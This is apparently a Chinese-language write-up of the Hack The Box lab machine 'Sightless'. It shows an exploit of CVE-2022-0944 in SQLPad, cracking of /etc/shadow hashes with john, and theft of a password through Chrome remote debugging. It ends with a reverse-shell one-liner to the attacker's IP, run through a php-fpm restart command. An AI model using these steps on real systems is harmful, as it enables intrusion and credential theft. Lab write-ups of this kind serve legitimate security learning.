Before all
蠻喜歡這台機器,算 real world 又有一些 rabbit hole
Victim’s IP : 10.10.11.32
Victim’s Host : *.sightless.htb
Attacker’s IP : 10.10.14.114
RECON
port scan
Command
1 | rustscan -a 10.10.11.32 --ulimit 5000 -- -sC -sV -Pn |
Result
1 | PORT STATE SERVICE REASON VERSION |
簡言之,有ssh/ftp/http services
subdomain discovery
連上 sightless.htb 後點擊按鈕,找到sqlpad.sightless.htb
Exploit
CVE-2022-0944
點下 About,找到版本:Version: 6.10.0
適用於PoC https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944/tree/main
Get Shell,不過在一個 Docker 環境內:
Privilege Escalation
/etc/shadow cracking
於容器內獲得 /etc/shadow 檔案及 /etc/passwd 檔案,載到攻擊者主機後利用 unshadow 及 john 進行字典攻擊
1 | unshadow passwd shadow > etc_hash |
1 | blindside (root) |
最後 michael 的權限可透過ssh登入成功
1 | ssh [email protected] |
Abusing chrome debug
以ssh進入主機後找到chrome debug開啟的狀況
用 ss -tulnp
命令挖掘到內網的8080 port有服務,以 ssh port forward 到本機:
內網 port 分布:
1 | Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process |
port forward:
1 | ssh -L 8080:localhost:8080 [email protected] |
同樣的方法把 port 33415, 46671 及 46497 也一起串出來
參考網路資料,先於chrome開啟chrome://inspect/#devices
連結,點下configure並把剛剛幾個port以ip 127.0.0.1 加入紀錄
過沒多久就可以抓到連線請求,點下 inspect,從畫面中找到網站登入密碼:
登入後可以到http://admin.sightless.htb:8080/admin_phpsettings.php?page=fpmdaemons
修改 php-fpm 重啟命令,如果直接改成reverse shell會被提示到格式不符
先在本機的 /tmp/rev.sh
建立reverse shell內容
1 | sh -i >& /dev/tcp/10.10.14.114/9999 0>&1 |
最後只需要 chmod +x /tmp/rev.sh
,然後把命令改成/tmp/rev.sh
就好惹
於主機 port 9999 get root!